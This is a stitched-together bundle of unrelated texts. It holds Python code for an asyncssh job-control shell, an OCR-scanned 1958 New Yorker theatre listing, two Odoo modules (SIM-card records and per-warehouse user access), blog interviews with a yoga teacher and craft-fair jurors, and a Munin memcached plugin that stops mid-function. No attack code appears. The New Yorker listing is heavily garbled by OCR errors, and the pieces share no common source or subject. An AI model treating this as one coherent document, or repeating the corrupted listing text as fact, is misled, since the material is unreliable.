,@@@MMX, . ▘▝ ▘▝▀ ▘ ▘▀▘▝▀▘ ▀▀ ▀▀ ▘ ▘ ▀▘▘ ▘ ▀ ▝▀▘▘ ▐ ▝▀▘▝▀ ▝▀▘\r
.H@@@@M@+,\r
/MMMM@MMH/. XM@MH; =;\r
/%+%$XHH@$= , .H@@@@MX,\r
.=--------. -%H.,@@@@@MX,\r
.%MM@@@HHHXX$$$%+- .:$MMX =M@@MM%.\r
=XMMM@MM@MM#H;,-+HMM@M+ /MMMX=\r
=%@M@M#@$-.=$@MM@@@M; %M%=\r
,:+$+-,/H#MMMMMMM@= =,\r
=++%%%%+/:-.\r
\r
\r
\r
"""
# Registry of SSH shell commands: name typed at the prompt -> coroutine.
COMMANDS = {}
def command(name):
    """Decorator factory: register the wrapped function in COMMANDS.

    NOTE(review): handlers are wrapped with ``asyncio.coroutine``
    (legacy generator-based coroutines, removed in Python 3.11);
    migrating to ``async def`` would touch every handler in this file.
    """
    def _(fn):
        # Wrap the plain generator so the event loop can schedule it.
        coro = asyncio.coroutine(fn)
        COMMANDS[name] = coro
        return coro
    return _
class StopItError(Exception):
    """Raised to break out of the interactive SSH command loop."""
@command("exit")
def exit(stdin, stdout, stderr, args=None):
    """SSH 'exit' command: abort the session loop via StopItError.

    NOTE: shadows the builtin ``exit``; it is only ever looked up
    through COMMANDS["exit"].
    """
    raise StopItError("Exit called")
@asyncio.coroutine
def readl(stdin, stdout, echo=True):
    """Read one line from the raw SSH *stdin* stream.

    Handles backspace/DEL editing, echoes printable characters when
    *echo* is True, and translates control keys: Ctrl-C raises
    StopItError, Ctrl-D raises EOFError, and carriage return (13)
    terminates the line, which is returned stripped.
    """
    buf = ""
    while not stdin.at_eof():
        bytes_ = (yield from stdin.read())
        for byte in bytes_:
            obyte = ord(byte)
            # Backspace (0x08) or DEL (127): erase the last char, if any.
            if obyte == 0x08 or obyte == 127:
                if buf != "":
                    stdout.write('\x08 \x08')
                    buf = buf[:-1]
                continue
            if obyte < 0x20:
                if obyte == 0x03:
                    raise StopItError("C-c")
                if obyte == 0x04:
                    raise EOFError("EOF hit")
                if obyte == 13:
                    stdout.write("\r\n")
                    return buf.strip()
                # Other control characters are ignored.
                continue
            if echo:
                stdout.write(byte)
            buf += byte
    return buf
@asyncio.coroutine
def error(name, stdin, stdout, stderr):
    """Report an unknown command *name* on *stderr*."""
    stderr.write("""\
Error! Command {} not found!
""".format(name))
@command("list")
def list(stdin, stdout, stderr, *, args=None):
    """SSH 'list' command: print every configured job.

    NOTE(review): shadows the builtin ``list``; the handler is only
    reached through COMMANDS, so the module-level name is cosmetic.
    """
    database = Service.resolve("moxie.cores.database.DatabaseService")
    jobs = yield from database.job.list()
    for job in jobs:
        stdout.write("[%s] - %s - %s\n\r" % (job.name, job.image, job.command))
@command("run")
def run(stdin, stdout, stderr, *, args=None):
    """SSH 'run' command: start the named job, then attach to its logs."""
    # Local `run` shadows this function's name with the RunService.
    run = Service.resolve("moxie.cores.run.RunService")
    if len(args) != 1:
        stderr.write("Just give me a single job name")
        return
    name, = args
    stdout.write("Starting job %s...\r\n" % (name))
    try:
        yield from run.run(name, 'ssh')
    except ValueError as e:
        stderr.write(str(e))
        return
    stdout.write(" Wheatley: Surprise! We're doing it now!\r\n")
    stdout.write("\n\r" * 3)
    # Immediately stream the new container's output.
    yield from attach(stdin, stdout, stderr, args=args)
@command("running")
def running(stdin, stdout, stderr, *, args=None):
    """SSH 'running' command: print each job with its container status.

    Jobs with no live container are reported as "offline".
    """
    container = Service.resolve("moxie.cores.container.ContainerService")
    database = Service.resolve("moxie.cores.database.DatabaseService")
    jobs = (yield from database.job.list())
    running = (yield from container.list(all=True))
    # Docker prefixes container names with "/"; index raw containers by name.
    nmap = {z: x for x in [x._container for x in running] for z in x['Names']}
    for job in jobs:
        cname = "/{}".format(job.name)
        # Empty-dict default makes the .get() below yield "offline";
        # (the original's `if container is None: pass` was dead code —
        # nmap.get(cname, {}) can never return None — and was removed).
        container = nmap.get(cname, {})
        stdout.write("{name} - {status}\n\r".format(
            name=job.name,
            status=container.get('Status', "offline")
        ))
@command("kill")
def kill(stdin, stdout, stderr, *, args=None):
    """SSH 'kill' command: terminate the container for one job by name."""
    container = Service.resolve("moxie.cores.container.ContainerService")
    if len(args) != 1:
        stderr.write("Just give me a single job name\r")
        return
    name, = args
    stdout.write("Killing job %s...\r\n\r\n" % (name))
    stdout.write(
        " GLaDOS: Ah! Well, this is the part where he kills us.\r\n"
    )
    try:
        yield from container.kill(name)
    except ValueError as e:
        stderr.write(str(e))
        return
    stdout.write(
        " Wheatley: Hello! This is the part where I kill you!\r\n\r\n"
    )
    stdout.write("Job terminated")
def aborter(stdin, *peers):
    """Watch *stdin* for Ctrl-C (0x03) and throw StopItError into *peers*.

    Runs as a companion coroutine beside long-lived writers (see
    ``attach``) so the user can abort a log stream with Ctrl-C.
    """
    while True:
        stream = yield from stdin.read()
        if ord(stream) == 0x03:
            for peer in peers:
                peer.throw(StopItError("We got a C-c, abort"))
            return
@command("attach")
def attach(stdin, stdout, stderr, *, args=None):
    """SSH 'attach' command: stream a running container's logs.

    A writer coroutine drains the container's log queue while an
    ``aborter`` watches stdin for Ctrl-C to cancel the stream.
    """
    container = Service.resolve("moxie.cores.container.ContainerService")
    if len(args) != 1:
        stderr.write("Just give me a single job name")
        return
    name, = args
    try:
        # Rebinds `container` from the service to the container object.
        container = yield from container.get(name)
    except ValueError as e:
        stderr.write(str(e))
        return
    @asyncio.coroutine
    def writer():
        # Drain the log queue until the log stream stops running.
        logs = container.logs
        logs.saferun()
        queue = logs.listen()
        while logs.running:
            out = yield from queue.get()
            stdout.write(out.decode('utf-8'))
        # raise StopItError("Attach EOF")
        stdout.write("[ process complete ]\r\n")
    w = writer()
    try:
        yield from asyncio.gather(w, aborter(stdin, w))
    except StopItError:
        return
def handler(key, user, container):
    """Build the asyncssh session handler bound to *key*/*user*.

    If *user* is None the key was accepted by SSH but has no User model:
    the handler prints an explanation (including the key fingerprint)
    and closes.  Otherwise it greets the user and runs a read-eval loop
    dispatching each input line to COMMANDS.
    """
    @asyncio.coroutine
    def handle_connection(stdin, stdout, stderr):
        if user is None:
            stderr.write("""\
\n\r
SSH works, but you did not provide a known key.\n\r
This may happen if your key is authorized but no User model is created\r
for you yet. Ping the cluster operator.\r
Your motives for doing whatever good deed you may have in mind will be\r
misinterpreted by somebody.\r
\r
    Fingerprint: {}
\n\r
""".format(hashlib.sha224(key.export_public_key('pkcs1-der')).hexdigest()))
            stdout.close()
            stderr.close()
            return
        stdout.write("Hey! I know you! You're {}\n\r".format(user.name))
        stdout.write(MOTD)
        stdout.write("\r\n{}\r\n\r\n".format(get_printable_fact()))
        # Read-eval loop: prompt, read a line, dispatch to COMMANDS.
        while not stdin.at_eof():
            stdout.write("* ")
            try:
                line = yield from readl(stdin, stdout)
            except asyncssh.misc.TerminalSizeChanged:
                # Redraw the prompt after a terminal resize.
                stdout.write("\r")
                continue
            except (StopItError, EOFError):
                stdout.close()
                stderr.close()
                break
            if line == "":
                continue
            cmd, *args = line.split()
            if cmd in COMMANDS:
                yield from COMMANDS[cmd](stdin, stdout, stderr, args=args)
            else:
                yield from error(line, stdin, stdout, stderr)
            stdout.write("\r\n")
        stdout.close()
        stderr.close()
    return handle_connection
class MoxieSSHServer(asyncssh.SSHServer):
    """asyncssh server that authenticates clients by public key only."""

    _keys = None        # class-level map: public key -> User model
    container = None    # username the client asked for
    user = None         # resolved User model after key validation

    def begin_auth(self, username):
        """Record the requested username and require authentication."""
        self.container = username
        return True

    def session_requested(self):
        """Build the per-session shell handler for this client."""
        return handler(self.key, self.user, self.container)

    def public_key_auth_supported(self):
        """Advertise that public-key authentication is accepted."""
        return True

    def validate_public_key(self, username, key):
        """Accept *key* only when it maps to a known user in ``_keys``."""
        self.key = key
        known = self._keys
        if known is None or key not in known:
            return False
        self.user = known[key]
        return True
def fingerprint(key):
    """Return the SHA-224 hex digest of *key*'s PKCS#1 DER public form."""
    der = key.export_public_key('pkcs1-der')
    return hashlib.sha224(der).hexdigest()
class SSHService(Service):
    """Service exposing the moxie command shell over SSH on port 2222."""
    identifier = "moxie.cores.ssh.SSHService"

    @asyncio.coroutine
    def __call__(self):
        """Load host/authorized keys, resolve users, and start the server."""
        database = Service.resolve("moxie.cores.database.DatabaseService")
        # self.alert = CronService.resolve("moxie.cores.alert.AlertService")
        # register an ssh callback for each thinger
        ssh_host_keys = asyncssh.read_private_key_list('ssh_host_keys')
        # Build the shared key -> user map once, on first start-up.
        if MoxieSSHServer._keys is None:
            authorized_keys = {}
            for key in asyncssh.read_public_key_list('authorized_keys'):
                authorized_keys[key] = (yield from
                    database.user.get_by_fingerprint(
                        fingerprint(key)))
            MoxieSSHServer._keys = authorized_keys
        obj = yield from asyncssh.create_server(
            MoxieSSHServer, '0.0.0.0', 2222,
            server_host_keys=ssh_host_keys
        )
        return obj
|
2 GOINGS ON ABOUT TOWN THE THEA TR.E (This week and next, some theatres, as in- dicated below, are rearranging their schedule because of Christmas and N e\v Year's Day. . . . q E. and \V. l11ean East and West of Broad- \\ av.) PLA YS THE COLD WIND AND THE W ARM-S N. Behr- l11an's fuzzy tragicomedy about Jewish life and love in \Y orcester, Massachusetts, half a century ago. \Vith Eli Wallach (miscast), and Maureen Stapleton, who plays a buoyant matchmaker. (110rosco, 45th St., W. CI 6- 6230. Xightly, except Sundays, at 8:40. Mat- inees \Vednesdays and Saturdays at 2:40.) CUE FOR PASSION-A neurotic triangle (mother, son, and stepfather) worked up by Elmer Ricè into a pretentious paraphrase of "Ham- let." John Kerr is the angry young stepson, Diana Wynyard the lady of his choice. (Hen- ry Miller, 43rd St., E. BR 9-3970. Nightly, except Sundays, at 8:40. 11atinées Thursdays and Saturdays at 2:40.) THE DISENCHANTED-Jason Robards, Jr., does a fine job as the hero of this account of the last sad days of a writer who resembles F. Scott Fitzgerald, but the play, written by Budd Schulberg and Harvey Breit, is an uneven work. (Coronet, 49th St.,. W. CI 6-8870 Xightly, except Sundays, at 8:30. Matinées \Vednesdays and Saturdays at 2:30.) THE GAZEBo-Alec Coppel's frail comedy about a TV writer who gets mixed up in a sus- pected murder is valiantly played by Walter Slezak and Jayne 11eadows. The dialogue, however, is a constant drag. (Lyceuln, 45th St., E. J1-- 2-3897. Nightly, except Sundays, at 8:40. Matinées Wednesdays and Satur- days at 2:40.) THE GIRLS IN 509-A. play that makes wide, satir- ical gestures but delivers nothing but jokes. Peggy \V ood and Imogene Coca are as funny as they can 111anage to be in the roles of a pair of Republican fugitives from Socialism (Belasco, 44th St., E. JU 6-7950. Kightly, except Sundays, at 8:40. 11atinées Wednes- days, except Dec. 31, and Saturdays at 2:40' special nlatinées Friday, Dec. 26, and Ne\ Year's Day.) J. 
B.- obody could have got more dramatic 11101nentu111 out of the Book of Job than Elia Kazan, who directed this fuddled moderniza- tion. by Archibald MacLeish, of the Bihlical tragedy. Pat Hingle, Christopher Plulnmer, and Raymond Massey do what they can with a grinl script. (A.XT l\. Theatre, 52nd St., W. CI 6-6 2 70. ightly, except Sundays, at 8:45. lHatinées Wednesdays, except Dec. 3 I, and Saturdays at 2:45, special matinées Friday, Dec. 26, and Kew Year's Day.) MAKE A MILLION-Sam Levene in a comedy \\ ritten by N onnan Barasch and Carroll Ioore, and directed by Jerome Chodorov. (Playhouse, 48th St., E. CI 5-6060. Nightly, except Sundays, at 8:40. Matinées vVednes- days and Saturdays at 2:40.) THE MARRIAGE-Go-RoUND- There is nothing par- ticularly original in this comedy by Leslie Ste\iens, 'which has to do with the difficulties of a happily married professor trying to keep his 1110noga1110us balance while being pursued by a S\\,edish i\lnazon, but Charles Boyer, Claudette Colbert, and Julie N eWl11ar fre- quently sparkle in the principal roles. (Plym- outh, 45th St., W. CI 6-9156. Nightly, except Sundays, at 8:40. 11atinées Wednesdays and Saturdays at 2:40; special matinée Friday, Dec. 26.) OLD Vlc-A five-week repertory of three Shakespearean plays, presented by S. Hurok. The ::,chedule through Jan. 3. "Henry V," \\ ith Laurence Harvey and 11argaret Cour- tenay, Thursday, Dec. 25, at 7:30; Friday, Dec. 26, at 8:30; and Saturday and Sunday, Dec. 27-28, at 2:30 and 8:30. . . . CjJ "Twelfth Kight," ,vith John Neville and Barbara J ef- ford, Tuesday through Friday, Dec. 30-Jan. 2, at 8: 30. . . . CjJ "Halnlet," also with John Neville and Barbara J efford, Saturday, Jan. 3, at 2:30 and 8. (Broadway Theatre, Broad- way at 53rd St. CI 7-7992. Through Satur- day, Jan. 10.) Nightly, except Mondays, at 8:40. Matinées Saturdays and Sundays at 2:40.) A TOUCH OF THE POET-Eugene O''Jeill's play about life in the United States back in the Colonial period. 
A satisfactory dranla that has the estimable services of Helen Hayes. This is its first American production. (Helen Hayes, 46th St., W. CI 6-6380. Nightly, ex- cept Sundays, at 8:30. Matinées Wednesdays, except Dec. 3 I, and Saturdays at 2: 30; special matinée New Year's Day) THE WORLD OF SUZIE WONG-A.. snlall, trite hymn to love in Hong Kong, lavishly orchestrated, and played with quiet skill and sincerity by a new actress named France Nuyen. Others . in the cast are \Villiam Shatner and Ron Randell. (Broadhurst, 44th St., W. CI 6- 6699. Nightly, except Sundays, at 8.40. Mati- nées \Vednesdays, except Dec. 31, and Sat- urdays at 2:40; special matinees Christmas and New Year's Day.) LONG RUNS-THE DARK AT THE TOP OF THE STAIRS: Oklahoma family life in the nineteen-twen- ties. Teresa VV right, i\udrey Christie, and George L. Smith have the leading roles in \Villiam Inge's play (Music Box, 45th St., VV. CI 6-4636. Nightly, except Sundays, at 8:40. 11atinées Wednesdays and Satur- days at 2:40; special matinée Friday, Dec. 26. Closes Saturday, Jan. 17..). . . LOOK HOME- WARD. ANGEL: Thomas Wolfe's monumental novel reduced by Ketti Frings to a coherent play Now with 11iriam Hopkins and Ed Begley. (Ethel Barrymore, 47th St., W. CI 6-0390. Xightly, except Sundays, at 8:40. 11atinées vVednesdays, except Dec. 31, and Saturdays at 2:40; special matinee New Year's Day.) . . . SUNRISE AT CAMPOBElLO: Ralph Bellamy as Franklin D. Roosevelt in Dore Schary's play centering on three crucial years in the late President's life. (Cort, 48th St., E. CI 5-4289. Nightly, except Sundays, at 8:40. Matinées vVednesdays and Saturdays at 2:40.). . TWO FOR THE SEESAW: Dana i\n- drews and Anne Bancroft are the whole cast of \Villiam Gibson's play about a couple of lonely people in New York. (Booth, 45th St., vV. CI 6-5969. Nightly, except Sundays, at 8:40. 11atinees Wednesdays, eÀcept Dec. 31, and Saturdays at 2:40; special nlatinée New Year's Day.) 
MUSICALS -'\ FLOWER DRUM SONG-The new musical by Rodg- ers and Hammerstein concerns a romantic imbroglio in San Francisco's Chinatown, and shows the great men at less than their best. Pat Suzuki, wIiyoshi Umeki, and Larry Bly- den perform brisk salvage work. (St. James, 44th St., \V. Li\ 4-4664. Nightly, except Sun- days, at 8:30. 11atinées Wednesdays and Saturdays at 2:30.) GOLDILOCKs-Elaine Stritch and Don ...t\meche in a handsomely dressed musical treatment of early motion-picture days that is fast, funny, and sometimes even thoughtful. Book by Jean and vValter Kerr, music by Leroy Anderson, and lyrics by Joan Ford and the Kerrs. (Lunt-Fontanne, 46th St., W. JU 6- 5555. Xightly, except Sundays, at :30. 11at- inées \tVednesdays and Saturdays at 2:30.) LA PL.UME DE MA T ANTE-...t\ stimulating importa- tion from France, \vhich has been beguiling audiences in Europe for a decade and ,vill probably do the same for you. ...t\ creation of Robert Dhéry, who is also the most promi- nent performer, the revue includes such other sound types as Colette Brosset, Pierre Olaf, Roger Caccia, and Jacques Legras. They ,;peak English when speaking is absolutely necessary. (Royale, 45th St., W. CI 5-5760. Nightly, except Sundays, at 8:30. 11atinees vVednesdays, except Dec. 31, and Saturdays at 2:30; special matinées Christmas and Tuesday, Dec. 30.) LONG RUNS-BELLS ARE RINGING: Judy Holliday as a telephone-answering-service girl who is dedicated to her job. (Alvin, 52nd St., W. CI 5-5226. Nightly, except Sundays, at 8:30. 11atinees Wednesdays, except Dec. 31, and Saturdays at 2:30; special matinée New Year's Day.) . . . JAMAICA: ...t\ tale of old West India, featuring Lena Horne. Harold ...t\r1en composed the music and E. Y. Harburg the lyrics. (Imperial, 45th St., W. CO 5-2412. S.M.T.W.T.F.S 25 26 27 28 29 JO JI I 2 J ONCE MORE. 
WITH FEELING-A farce about the symphony-concert business that has a few bright lines in it, and a great deal of non- sense \\Tith Arlene Francis, Joseph Cotten, and Joseph Buloff. (National, 41st St., \\T. \V] 7-5510. Nightly, except Sundays, at 8:40. Matinées Wednesdays and Saturdays at 2:40.) THE PLEASURE OF HIS COMPANy-Cyril Ritchard has given smooth direction and a polished performance to this somewhat sententious comedy, by Samuel Taylor and Cornelia Otis Skinner, about family life in San Francisco. The cast also includes Charlie Ruggles, \Valter Abel, Dolores Hart, and 11iss Skin- ner herself. (Longacre, 48th St., W. CI 6- 5639. Nightly, except Sundays, at 8:40. lVlatinées \tVednesdays and Saturdays at 2:40.) SAY. DARLING-This very successful backstage comedy is partly the work of Richard Bissell, \vho also wrote the novel on which it is based. Betty Comden, ...t\dolph Green, and J ule Styne contributed nine songs, and Eddie ...t\lbert, Vivian Blaine, and Johnny Desmond are in the large and gifted cast. (:Nlartin Beck, 45th St., W. CI 6-6363. Nightly, except Sun- days, at 8:40. Matinées \Vednesdays, except Dec. 31, and Saturdays at 2:40; special matinées Christmas and New Year's Day.) THE SHADOW OF A GUNMAN-Sean O'Casey's bril- liant early tragicomedy about Dublin in the troubled twenties. The production, an ...t\ctors' Studio effort featuring William Smithers and Gerald O'Loughlin, is more than a little la- borious. (Bijou, 45th St., W. JU 6-5442. r" ....; THE ART GALLERIES BOOKS THE CURRENT CINEMA MUSICAL EVENTS THE THEATRE THE. NE. W YORKER 25 WE-ST 4JRD STR,E.E. T TELEPHONE ADVE.R TISlt-oG " SUßSCRIPTIONS. OXfOR.D .5-1.51.) EDITORIAL OffiCES. OXFORD .5-1414 Page 61 66 60 64 52 THE NEW YORKER, published weekly by The New Yorker Magazine, Inc., 25 \V. 43rd St., Kew York 36, N. Y. R. H. Fleischmann, chairman of the board' . .B. B.otsford, president; E. R. Spaulding and R. H. Truax, vice-presidents; P. F. Fleischmann, treasurer; 11. L. Fries.. secretary; A. 
J. Russell, Jr., advertising director. Vol. XXXIV, No. 45. December 27, 1958. Second-class postage paid at New York, N.Y., and at Greenwich, Conn. © 1958 by The New Yorker Magazine, Inc., in the United States and Canada. All rights reserved. No part of this periodical may be reproduced without the consent of The New Yorker. Printed in U.S.A. Subscription rates: U.S. and possessions, 1 year $7.00; Canada, Latin America, and Spain, $8.00. Other foreign, $10.00. CHANGE OF ADDRESS: It is essential that subscribers ordering a change of address give four weeks' notice and provide their old as well as their new address. Please give postal zone numbers for both addresses.
|
# -*- coding: utf-8 -*-
from openerp import models, fields, api
from datetime import datetime, timedelta, date
from dateutil.relativedelta import relativedelta
class Sim(models.Model):
    """A physical SIM card record, tracking reception and the contract
    milestone dates derived from it."""

    _name = 'sim'
    _order = 'date_sim desc'
    _inherit = ['mail.thread', 'ir.needaction_mixin']

    user_number = fields.Char(string='SIM User Number', required=True, copy=False,)
    phone = fields.Char(string='SIM Tel Number', required=False, copy=False,)
    sim_id = fields.Char(string='SIM ID', copy=False,)
    date_sim = fields.Datetime(string='Record Date', required=True, index=True, copy=False, default=fields.Datetime.now,)
    iccid_number = fields.Char(string='Iccid Number', copy=False,)
    reception_date = fields.Date(string='Reception Date', required=True, copy=False, store=True, index=True,)

    # Derived automatically from reception_date by _date_calc() below.
    arrival_date = fields.Date(string='Arrival Date', store=True)
    charge_date = fields.Date(string='Freebit Charge Date', store=True)
    min_month = fields.Date(string='Minimum Usage Date', store=True)
    expiration_date = fields.Date(string='Expiration Date', store=True)

    @api.onchange('reception_date')
    def _date_calc(self):
        """Fill the milestone dates whenever the reception date changes.

        arrival/charge date = reception + 2 days
        minimum usage date  = reception + 2 days + 12 months
        expiration date     = reception + 2 days + 24 months
        """
        # Datetime.from_string pads a bare date with " 00:00:00", so it
        # also accepts the Date value stored in reception_date.
        received = fields.Datetime.from_string(self.reception_date)
        if not received:
            return
        arrival = received + relativedelta(days=2)
        # One consolidated update() keeps the derived values consistent
        # instead of four separate calls (and avoids shadowing the
        # builtin `min`, as the previous code did).
        self.update({
            'arrival_date': arrival,
            'charge_date': arrival,
            'min_month': received + relativedelta(days=2, months=12),
            'expiration_date': received + relativedelta(days=2, months=24),
        })

    @api.multi
    def applicate_sim(self):
        # TODO: implement the SIM application workflow (button stub).
        pass

    @api.multi
    def arrival_sim(self):
        # TODO: implement the SIM arrival workflow (button stub).
        pass
class SimType(models.Model):
    # Master data describing a SIM plan/type: identifiers, billing
    # parameters, and the one-off commission fees charged for each
    # SIM lifecycle event.
    _name = 'sim_type'
    # NOTE(review): _order refers to 'date_sim', but no such field is
    # declared on this model -- confirm it is inherited or added
    # elsewhere, otherwise record ordering will fail.
    _order = 'date_sim desc'
    sim_type_id = fields.Char(string='SIM Type ID', required=True, copy=False,)
    max_storage = fields.Char(string='Max Strage')
    business_number = fields.Char(string='Business Number')
    size_code = fields.Char(string='Size Code')
    # The labels below are romaji (Japanese): presumably billing start
    # day, computation method, and pay-per-use up/down rates -- TODO
    # confirm the exact meanings with the business side.
    deta_code = fields.Char(string='Kakinkaishibi')
    datermination = fields.Char(string='Sansyutuhouhou')
    pay_per_up = fields.Char(string='Juuryoukakin Up')
    pay_per_down = fields.Char(string='Juuryoukakin Down')
    min_use_time = fields.Char(string='Minimum Perion of Use')
    ### charge ###
    basic_charge = fields.Integer(string='Basic Charge')
    cancel_charge = fields.Integer(string='Cancel Charge')
    admin_charge = fields.Integer(string='Admin Charge')
    ### commission ###
    opening_sim = fields.Integer(string='Opening Sim Commission')
    opening_sim_up = fields.Integer(string='Opening Sim Commission up')
    unreturned_sim = fields.Integer(string='Unreturned Sim Commission')
    reissure_sim = fields.Integer(string='Reissure Sim Commission')
    change_plan = fields.Integer(string='Change Plan Commission')
    change_size = fields.Integer(string='Change Size Commission')
    redelivery_sim = fields.Integer(string='Redelivery Sim Commission')
    stop_sim = fields.Integer(string='Stop Sim Commission')
    delivery_sim = fields.Integer(string='Delivery Sim Commission')
    universal_service = fields.Integer(string='Universal Service Commission')
    cancel_charge_first = fields.Integer(string='Cancel Charge 1month')
    cancel_charge_year = fields.Integer(string='Cancel Charge Year')
    # Monthly data-volume charge tiers.
    charge100 = fields.Integer(string='100MB')
    charge500 = fields.Integer(string='500MB')
    charge1000 = fields.Integer(string='1000MB')
    ip_month = fields.Integer(string='IP Charge')
    date_model = fields.Char(string='Date Model')
|
As most of you know, we love to host awesomely unique events here at Fresh Tracks Farm. One of our newest combinations is wine and YOGA! I think we can all agree that yoga and wine is an amazing and refreshing combination. I find that it is the best way to revitalize and relax, which is why we hope you FTF fans will join in! The wonderful woman behind this special event is Lori Flower. Yoga has been a part of her life for the past 18 years, and we feel so lucky to have her share her passion with us here. I sat down with Lori on a snowy Thursday night and asked her a few questions about her life and career with yoga.
Camila: How long have you been teaching/doing yoga?
Lori: I’ve been practicing yoga since 1994 and teaching since 2000.
C: What drove you to become a yoga instructor?
L: Destiny. I had been on a different track in college, graduating with a degree in Film, but was so inspired by my yoga practice and enjoyed that much more than working in the film industry. An opportunity arose for me to work as the staff photographer at a Holistic Learning center (Omega) where I could immerse myself in Yoga, meditation and other healing modalities while meeting inspiring teachers daily. That was the catalyst for creating a change in my life to attend yoga teacher training and pursue it as a life path.
C: How do you feel like yoga affects your everyday life?
L: Yoga affects my everyday life immensely. I feel more responsible for taking care of my health and well-being. I center myself daily through conscious breathing and self-motivate through strengthening yogic practices. It’s a constant reminder that I’m dedicated to the path of self-awareness. I also work with Mantra Japa (the mental practice of positive affirmations) to clear my mind and focus on cultivating good things in life.
C: Other than Yoga, what are some of your favorite hobbies?
L: Besides yoga, I also have a background as an herbalist, and run an organic and natural skin care company called Perfect Cream (www.perfectcream.com)where I handcraft herbal skin remedies. I also enjoy cooking vegan and falling in love!
C: What are some of your favorite yoga positions and why?
L: Hand Stands and Pigeon Pose. Hand stands are more challenging and take a lot of discipline. They’re easy for me now, but I like to look back at all the hard work I did to get there. And the pigeon pose is great for the hips!
C: Lastly, what is your favorite FTF wine?
L: The Maple wine! It’s so unique.
If you would like to register for a class please contact Lori at [email protected]. It is $8 per class and ALL LEVELS ARE WELCOME. Don’t be shy!
Or like her on Facebook! https://www.facebook.com/pages/Sattva-Yoga/140333232749366?ref=ts&fref=ts.
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Limit User Access per Warehouse
# Copyright (C) 2016 Vadim (<http://based.at>).
# OpenERP, Open Source Management Solution
# Copyright (c) 2004-2016 Odoo S.A.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import models, fields, api
class ResUsers(models.Model):
    _inherit = 'res.users'

    @api.one
    def _get_location_ids(self):
        """Compute the stock locations this user may access.

        A location qualifies when it is not attached to any warehouse
        (virtual location, asset location) or when its warehouse is one
        of the user's allowed warehouses.  When no warehouse restriction
        is configured, every location is visible.
        """
        visible = self.env['stock.location'].search([])
        if self.warehouse_ids:
            # False stands for "location without a warehouse".
            allowed = [False] + [warehouse.id for warehouse in self.warehouse_ids]
            visible = visible.filtered(
                lambda location: visible.get_warehouse(location) in allowed)
        self.location_ids = visible

    warehouse_ids = fields.Many2many('stock.warehouse', string='Allowed Warehouses',
                                     help='List of allowed warehouses. If empty, the user can access all warehouses.')
    location_ids = fields.One2many('stock.location', string='Allowed Locations', compute='_get_location_ids')
class StockWarehouse(models.Model):
    _inherit = 'stock.warehouse'

    @api.one
    def _get_user_ids(self):
        """Compute the "Warehouse / Users" who can access this warehouse.

        A stock user qualifies when he has no warehouse restriction at
        all, or when this warehouse appears in his allowed warehouses.
        """
        stock_users = self.env['ir.model.data'].xmlid_to_object('stock.group_stock_user').users
        self.user_ids = [
            candidate.id
            for candidate in stock_users
            if not candidate.warehouse_ids or self in candidate.warehouse_ids
        ]

    user_ids = fields.One2many('res.users', string='Authorized Users', compute='_get_user_ids',
                               help='List of users authorized to access the warehouse.')
|
A. I started making art really young, as I grew up in a small arts community filled with galleries and artists. It was perfectly normal to pursue the arts as a way of like. I learned to sew when I was 10 and did loads of other arts activities, like ballet, oil painting, and ceramics as I grew up. I received a BFA in studio art from the School of the Art Institute of Chicago with a focus in Film, Video, and New Media. I made art, sewed my own wardrobe, and worked in arts administration until one day when I participated in the second Renegade Craft Fair. I sold clothing I made and it was a hit. From there it all just snowballed- I started writing for magazines, wrote my first book for Random House, started teaching sewing, and then launched my line of sewing patterns. I'm still writing, teaching, and designing today!
Q. What/who is your biggest inspiration?
A. My patterns are inspired by a host of things, but mostly from observing people, films, and vintage materials like yearbooks and sewing patterns. I want the women who sew my patterns to feel beautiful and unfussy. I prefer a quiet life and never want the need to be clothed to be a burden; rather it should be a joy.
Q. How did you get into your position in the arts & crafts world?
A. I got here after years and years of stubborn hard work! There is no way to work for yourself without really working hard at it.
Q. Tell us about a few favorites of your: Weekend activity? Food? Color? Animal?
A. Since I almost always teach on Saturdays, my weekends are usually Sunday and Monday. A favorite Sunday activity is the simple pleasure of having a long leisurely breakfast and reading the Sunday papers with my boyfriend. A favorite food is hummus! It's a weakness for sure. My favorite "colors" are green and blue, but my real favorite is gray, if that can be considered a color. And my favorite animals are my kitties, Sally and Pinta.
Q. What do you love most about the handmade movement?
A. I love it when my students come into class- innocently learning to sew so they can make clothes for their kids or something for their home- then slowly become aware of what a revolutionary act this truly is. They don't come to class with the intention of rethinking how things are made and how they consume mass-produced products, but most eventually start to think about the cost of materials and labor really quickly into learning things for themselves. It's empowering in a way that they didn't expect, and to witness that transformation is incredible.
Q. What is the most important feature in an artist's application for you?
A. Honesty. The work must read true and like it's coming from their own voice.
Q. What are you most looking forward to in being a part of the Jackalope Arts jury?
A. I'm excited to see all the work come in and then to see the finished show!
Q. Where can we find our more about you?
Learn about all of the Pasadena, Jackalope jurors here!
A. I moved to LA from Brooklyn in 2013 to open Los Angeles County Store. I was inspired by the makers I met in NYC while hawking my baubles under the Wabisabi Brooklyn brand.
A. I continue to be inspired by the creativity, hard work, and determination of the local artists and artisans whose work I represent in the shop.
A. I performed a magic trick: I turned my Brooklyn house into a Los Angeles Shop. Also, equal parts hustle, chutzpah, and the encouragement and support of others.
Weekend activity: Napping. Food: Bread. Color: Periwinkle. Animal: French Bulldog puppies make any day better. But any dog or kitty pretty much.
A. It restores my faith in humanity and connects me to some of the best people I’ve ever met.
Q. What is the most important feature in an artist’s application for you? A. Nothing matters more than the work itself. Is it original? Is it well-made? Do I want it or know someone who wants it?
A. Seeing all the amazing stuff people make!
L.A. County Store on Instagram!
Check out all of our Pasadena jurors here!
|
#!/usr/bin/env python
import os
import socket
from vendor.munin import MuninPlugin
class MuninMemcachedPlugin(MuninPlugin):
    """Munin plugin base that graphs statistics from a memcached server."""

    category = "Memcached"

    def autoconf(self):
        """Return True when a memcached server is reachable, else False."""
        try:
            self.get_stats()
        except socket.error:
            return False
        return True

    def get_stats(self):
        """Fetch the server's `stats` output as a dict of name -> value.

        The server address is taken from the MEMCACHED_HOST and
        MEMCACHED_PORT environment variables (default 127.0.0.1:11211).
        """
        host = os.environ.get('MEMCACHED_HOST') or '127.0.0.1'
